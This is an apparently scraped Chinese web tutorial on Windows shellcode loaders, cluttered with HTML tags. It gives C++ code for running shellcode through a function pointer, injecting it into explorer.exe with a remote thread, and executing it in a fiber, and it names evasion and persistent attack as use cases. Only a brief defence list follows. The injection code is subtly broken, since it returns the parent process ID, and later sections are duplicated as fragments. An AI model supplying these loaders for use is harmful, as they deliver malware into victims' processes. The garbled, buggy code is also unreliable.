Shellcode Loader 技术详解<\/h1>

1. 基础概念<\/h2>
Shellcode Loader 是一种用于加载和执行 shellcode 的技术，通过多种方式将恶意代码注入到进程内存中并执行。本文详细介绍几种常见的 shellcode 加载技术。<\/p>

2. 指针直接执行法<\/h2>

2.1 基础实现<\/h3>

#include<\/span> <iostream><\/span>
<\/span><\/span><\/span>#include<\/span> <Windows.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 指定链接器选项,修改.data段为可读、可写、可执行
<\/span><\/span><\/span><\/span>#pragma comment(linker, "\/section:.data,RWE")
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ shellcode
<\/span><\/span><\/span><\/span>unsigned<\/span> char<\/span> hexData[990<\/span>] =<\/span> {};
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    \/\/ 将hexData转换为函数指针并执行
<\/span><\/span><\/span><\/span>    ((void<\/span> (*<\/span>)(void<\/span>))&<\/span>hexData)();
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.2 DEP 保护问题与解决方案<\/h3>
现代 Windows 系统有 DEP(数据执行保护)机制，需要手动修改内存保护属性：<\/p>
int<\/span> main<\/span>() {
<\/span><\/span>    VirtualProtect(hexData, sizeof<\/span>(hexData), PAGE_EXECUTE_READWRITE, NULL);
<\/span><\/span>    ((void<\/span> (*<\/span>)(void<\/span>))&<\/span>hexData)();
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>VirtualProtect<\/code> 函数参数：<\/p>

lpAddress<\/code>: 要修改的内存区域的起始地址<\/li>
dwSize<\/code>: 需要修改的内存区域大小(字节)<\/li>
flNewProtect<\/code>: 新的保护属性<\/li>
lpflOldProtect<\/code>: 保存旧的保护属性的指针<\/li>
<\/ul>
3. 远程线程注入<\/h2>
3.1 基本流程<\/h3>

获得目标进程ID<\/li>
写入线程shellcode<\/li>
<\/ol>
3.2 关键API函数<\/h3>
CreateToolhelp32Snapshot<\/h4>
HANDLE WINAPI CreateToolhelp32Snapshot<\/span>(
<\/span><\/span>    _In_ DWORD dwFlags,  \/\/ 快照类型
<\/span><\/span><\/span><\/span>    _In_ DWORD th32ProcessID  \/\/ 进程ID
<\/span><\/span><\/span><\/span>);
<\/span><\/span><\/code><\/pre>快照类型标志：<\/p>

TH32CS_SNAPALL<\/code>: 包含所有进程、线程、堆和模块<\/li>
TH32CS_SNAPPROCESS<\/code>: 只包含进程<\/li>
TH32CS_SNAPTHREAD<\/code>: 只包含线程<\/li>
TH32CS_SNAPHEAPLIST<\/code>: 指定进程的堆<\/li>
TH32CS_SNAPMODULE<\/code>: 指定进程的模块<\/li>
TH32CS_INHERIT<\/code>: 快照句柄可被子进程继承<\/li>
<\/ul>
OpenProcess<\/h4>
HANDLE OpenProcess<\/span>(
<\/span><\/span>    DWORD dwDesiredAccess,  \/\/ 访问权限
<\/span><\/span><\/span><\/span>    BOOL bInheritHandle,    \/\/ 是否继承句柄
<\/span><\/span><\/span><\/span>    DWORD dwProcessId       \/\/ 进程ID
<\/span><\/span><\/span><\/span>);
<\/span><\/span><\/code><\/pre>VirtualAllocEx<\/h4>
LPVOID VirtualAllocEx<\/span>(
<\/span><\/span>    HANDLE hProcess,        \/\/ 进程句柄
<\/span><\/span><\/span><\/span>    LPVOID lpAddress,       \/\/<\/span> 内存基址<\/span>(NULL为自动选择<\/span>)
<\/span><\/span>    SIZE_T dwSize,          \/\/ 大小(字节)
<\/span><\/span><\/span><\/span>    DWORD flAllocationType, \/\/ 内存分配类型
<\/span><\/span><\/span><\/span>    DWORD flProtect         \/\/ 内存保护类型
<\/span><\/span><\/span><\/span>);
<\/span><\/span><\/code><\/pre>内存分配类型：<\/p>

MEM_COMMIT<\/code>: 提交内存区域<\/li>
MEM_RESERVE<\/code>: 保留内存区域<\/li>
MEM_RESET<\/code>: 指示内存数据无效<\/li>
MEM_TOP_DOWN<\/code>: 在高地址分配内存<\/li>
MEM_WRITE_WATCH<\/code>: 跟踪写入页面<\/li>
MEM_PHYSICAL<\/code>: 分配物理内存<\/li>
<\/ul>
内存保护类型：<\/p>

PAGE_EXECUTE<\/code>: 可执行<\/li>
PAGE_EXECUTE_READ<\/code>: 可读可执行<\/li>
PAGE_EXECUTE_READWRITE<\/code>: 可读写可执行<\/li>
PAGE_EXECUTE_WRITECOPY<\/code>: 可读写可执行(写时复制)<\/li>
PAGE_NOACCESS<\/code>: 不可访问<\/li>
PAGE_READONLY<\/code>: 只读<\/li>
PAGE_READWRITE<\/code>: 可读写<\/li>
PAGE_WRITECOPY<\/code>: 可读写(写时复制)<\/li>
<\/ul>
WriteProcessMemory<\/h4>
BOOL WriteProcessMemory<\/span>(
<\/span><\/span>    HANDLE hProcess,             \/\/ 进程句柄
<\/span><\/span><\/span><\/span>    LPVOID lpBaseAddress,        \/\/ 基址
<\/span><\/span><\/span><\/span>    LPCVOID lpBuffer,            \/\/ 源缓冲区指针
<\/span><\/span><\/span><\/span>    SIZE_T nSize,                \/\/ 要写入的大小
<\/span><\/span><\/span><\/span>    SIZE_T*<\/span> lpNumberOfBytesWritten  \/\/ 实际写入字节数
<\/span><\/span><\/span><\/span>);
<\/span><\/span><\/code><\/pre>CreateRemoteThread<\/h4>
HANDLE CreateRemoteThread<\/span>(
<\/span><\/span>    HANDLE hProcess,              \/\/ 进程句柄
<\/span><\/span><\/span><\/span>    LPSECURITY_ATTRIBUTES lpThreadAttributes, \/\/ 安全属性
<\/span><\/span><\/span><\/span>    SIZE_T dwStackSize,           \/\/ 线程栈大小
<\/span><\/span><\/span><\/span>    LPTHREAD_START_ROUTINE lpStartAddress, \/\/ 线程函数指针
<\/span><\/span><\/span><\/span>    LPVOID lpParameter,           \/\/ 线程参数
<\/span><\/span><\/span><\/span>    DWORD dwCreationFlags,        \/\/ 创建标志
<\/span><\/span><\/span><\/span>    LPDWORD lpThreadId           \/\/ 线程ID
<\/span><\/span><\/span><\/span>);
<\/span><\/span><\/code><\/pre>3.3 完整实现代码<\/h3>
DWORD findProcessId<\/span>(const<\/span> wchar_t<\/span>*<\/span> targetProcessName) {
<\/span><\/span>    HANDLE hShot =<\/span> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0<\/span>);
<\/span><\/span>    PROCESSENTRY32 pe;
<\/span><\/span>    pe.dwSize =<\/span> sizeof<\/span>(pe);
<\/span><\/span>    
<\/span><\/span>    if<\/span> (Process32First(hShot, &<\/span>pe)) {
<\/span><\/span>        do<\/span> {
<\/span><\/span>            if<\/span> (wcscmp(pe.szExeFile, targetProcessName) ==<\/span> 0<\/span>) {
<\/span><\/span>                CloseHandle(hShot);
<\/span><\/span>                return<\/span> pe.th32ParentProcessID;
<\/span><\/span>            }
<\/span><\/span>        } while<\/span> (Process32Next(hShot, &<\/span>pe));
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    const<\/span> wchar_t<\/span>*<\/span> targetProcessName =<\/span> L<\/span>"explorer.exe"<\/span>;
<\/span><\/span>    DWORD proessId =<\/span> findProcessId(targetProcessName);
<\/span><\/span>    
<\/span><\/span>    HANDLE openPr =<\/span> OpenProcess(PROCESS_ALL_ACCESS, FALSE, proessId);
<\/span><\/span>    LPVOID mec =<\/span> VirtualAllocEx(openPr, NULL, sizeof<\/span>(shellcode), 
<\/span><\/span>                               MEM_COMMIT |<\/span> MEM_RESERVE, 
<\/span><\/span>                               PAGE_EXECUTE_READWRITE);
<\/span><\/span>    
<\/span><\/span>    SIZE_T bytes;
<\/span><\/span>    WriteProcessMemory(openPr, mec, shellcode, sizeof<\/span>(shellcode), &<\/span>bytes);
<\/span><\/span>    
<\/span><\/span>    HANDLE hThread =<\/span> CreateRemoteThread(openPr, NULL, 0<\/span>, 
<\/span><\/span>                                       (LPTHREAD_START_ROUTINE)mec, 
<\/span><\/span>                                       NULL, 0<\/span>, NULL);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 纤程执行技术<\/h2>
纤程(Fiber)是用户级的轻量级并发单元，与线程不同，不依赖操作系统调度，由应用程序管理。<\/p>
4.1 关键API函数<\/h3>
ConvertThreadToFiber<\/h4>
PVOID ConvertThreadToFiber<\/span>(PVOID pFiber);  \/\/ 将当前线程转化为纤程
<\/span><\/span><\/span><\/code><\/pre>CreateFiber<\/h4>
PVOID CreateFiber<\/span>(
<\/span><\/span>    SIZE_T dwStackSize,           \/\/ 纤程栈大小
<\/span><\/span><\/span><\/span>    LPFIBER_START_ROUTINE pFiberProc,  \/\/ 函数指针
<\/span><\/span><\/span><\/span>    PVOID pParameter              \/\/ 参数指针
<\/span><\/span><\/span><\/span>);
<\/span><\/span><\/code><\/pre>SwitchToFiber<\/h4>
void<\/span> SwitchToFiber<\/span>(PVOID pFiber);  \/\/ 切换到指定纤程
<\/span><\/span><\/span><\/code><\/pre>DeleteFiber<\/h4>
void<\/span> DeleteFiber<\/span>(PVOID pFiber);    \/\/ 删除纤程对象
<\/span><\/span><\/span><\/code><\/pre>4.2 完整实现代码<\/h3>
DWORD oldProtect;
<\/span><\/span>VirtualProtect((LPVOID)buf, sizeof<\/span>(buf), PAGE_EXECUTE_READWRITE, &<\/span>oldProtect);
<\/span><\/span>
<\/span><\/span>\/\/ 将当前线程转换为纤程
<\/span><\/span><\/span><\/span>ConvertThreadToFiber(NULL);
<\/span><\/span>
<\/span><\/span>\/\/ 创建纤程对象关联到shellcode
<\/span><\/span><\/span><\/span>void<\/span>*<\/span> shellcodeFiber =<\/span> CreateFiber(0<\/span>, (LPFIBER_START_ROUTINE)(LPVOID)buf, NULL);
<\/span><\/span>
<\/span><\/span>\/\/ 切换到新创建的纤程执行shellcode
<\/span><\/span><\/span><\/span>SwitchToFiber(shellcodeFiber);
<\/span><\/span>
<\/span><\/span>\/\/ 删除纤程对象
<\/span><\/span><\/span><\/span>DeleteFiber(shellcodeFiber);
<\/span><\/span><\/code><\/pre>5. 技术对比<\/h2>



技术<\/th>
优点<\/th>
缺点<\/th>
适用场景<\/th>
<\/tr>
<\/thead>


指针直接执行<\/td>
实现简单<\/td>
易被DEP拦截<\/td>
简单测试环境<\/td>
<\/tr>

远程线程注入<\/td>
隐蔽性较好<\/td>
需要目标进程权限<\/td>
持久化攻击<\/td>
<\/tr>

纤程执行<\/td>
用户态调度<\/td>
实现较复杂<\/td>
高级规避技术<\/td>
<\/tr>
<\/tbody>
<\/table>
6. 防御措施<\/h2>

启用DEP(数据执行保护)<\/li>
使用ASLR(地址空间布局随机化)<\/li>
限制进程权限<\/li>
监控可疑的API调用<\/li>
使用行为检测而非特征检测<\/li>
<\/ol>
7. 参考文献<\/h2>

Microsoft DEP文档<\/a><\/li>
VirtualAllocEx文档<\/a><\/li>
OpenProcess文档<\/a><\/li>
WriteProcessMemory文档<\/a><\/li>
创建线程加载技术<\/a><\/li>
<\/ol>

技术<\/th>	优点<\/th>	缺点<\/th>	适用场景<\/th> <\/tr> <\/thead>
指针直接执行<\/td>	实现简单<\/td>	易被DEP拦截<\/td>	简单测试环境<\/td> <\/tr>
远程线程注入<\/td>	隐蔽性较好<\/td>	需要目标进程权限<\/td>	持久化攻击<\/td> <\/tr>
纤程执行<\/td>	用户态调度<\/td>	实现较复杂<\/td>	高级规避技术<\/td> <\/tr> <\/tbody> <\/table> 6. 防御措施<\/h2> 启用DEP(数据执行保护)<\/li> 使用ASLR(地址空间布局随机化)<\/li> 限制进程权限<\/li> 监控可疑的API调用<\/li> 使用行为检测而非特征检测<\/li> <\/ol> 7. 参考文献<\/h2> Microsoft DEP文档<\/a><\/li> VirtualAllocEx文档<\/a><\/li> OpenProcess文档<\/a><\/li> WriteProcessMemory文档<\/a><\/li> 创建线程加载技术<\/a><\/li> <\/ol>

Shellcode Loader 技术详解<\/h1>

1. 基础概念<\/h2> Shellcode Loader 是一种用于加载和执行 shellcode 的技术，通过多种方式将恶意代码注入到进程内存中并执行。本文详细介绍几种常见的 shellcode 加载技术。<\/p>

2. 指针直接执行法<\/h2>

3. 远程线程注入<\/h2>

3.2 关键API函数<\/h3>

4. 纤程执行技术<\/h2> 纤程(Fiber)是用户级的轻量级并发单元，与线程不同，不依赖操作系统调度，由应用程序管理。<\/p>

4.1 关键API函数<\/h3>

7. 参考文献<\/h2> Microsoft DEP文档<\/a><\/li> VirtualAllocEx文档<\/a><\/li> OpenProcess文档<\/a><\/li> WriteProcessMemory文档<\/a><\/li> 创建线程加载技术<\/a><\/li> <\/ol>

1. 基础概念<\/h2>
Shellcode Loader 是一种用于加载和执行 shellcode 的技术，通过多种方式将恶意代码注入到进程内存中并执行。本文详细介绍几种常见的 shellcode 加载技术。<\/p>

4. 纤程执行技术<\/h2>
纤程(Fiber)是用户级的轻量级并发单元，与线程不同，不依赖操作系统调度，由应用程序管理。<\/p>

7. 参考文献<\/h2>

Microsoft DEP文档<\/a><\/li>
VirtualAllocEx文档<\/a><\/li>
OpenProcess文档<\/a><\/li>
WriteProcessMemory文档<\/a><\/li>
创建线程加载技术<\/a><\/li> <\/ol>